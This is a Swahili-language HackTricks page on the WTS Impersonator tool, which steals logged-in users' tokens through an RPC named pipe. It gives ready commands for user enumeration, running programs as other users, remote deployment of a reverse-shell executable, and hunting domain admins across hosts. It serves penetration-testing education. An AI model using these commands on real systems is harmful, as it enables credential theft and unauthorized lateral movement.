mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-17 06:28:27 +00:00
4.3 KiB
4.3 KiB
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa kipekee wa NFTs
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Zana ya WTS Impersonator inatumia bomba la jina la RPC la "\pipe\LSM_API_service" kwa siri kuchunguza watumiaji walioingia na kuiba alama zao, ikipita njia za kawaida za udanganyifu wa Alama. Njia hii inawezesha harakati za upande kwa upande ndani ya mitandao. Ubunifu nyuma ya mbinu hii unatolewa kwa Omri Baso, ambaye kazi yake inapatikana kwenye GitHub.
Uwezo Muhimu
Zana hufanya kazi kupitia mfululizo wa wito wa API:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Moduli muhimu na Matumizi
- Kutambua Watumiaji: Kutambua watumiaji wa ndani na wa mbali kunawezekana na zana hii, kwa kutumia amri kwa hali yoyote:
- Kwa ndani:
.\WTSImpersonator.exe -m enum
- Kwa mbali, kwa kutoa anwani ya IP au jina la mwenyeji:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
- Kutekeleza Amri: Moduli za
exec
naexec-remote
zinahitaji muktadha wa Huduma ili kufanya kazi. Utekelezaji wa ndani unahitaji tu faili ya WTSImpersonator na amri: - Mfano wa utekelezaji wa amri ya ndani:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exe inaweza kutumika kupata muktadha wa huduma:
.\PsExec64.exe -accepteula -s cmd.exe
- Utekelezaji wa Amri kwa Mbali: Inahusisha kuunda na kusakinisha huduma kwa mbali kama PsExec.exe, kuruhusu utekelezaji na ruhusa sahihi.
- Mfano wa utekelezaji wa mbali:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Moduli ya Kumtafuta Mtumiaji: Inalenga watumiaji maalum kwenye mashine nyingi, ikitekeleza nambari chini ya uadilifu wao. Hii ni muhimu hasa kwa kulenga Waendeshaji wa Kikoa wenye haki za usimamizi wa ndani kwenye mifumo kadhaa.
- Mfano wa matumizi:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi wa PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud github repos.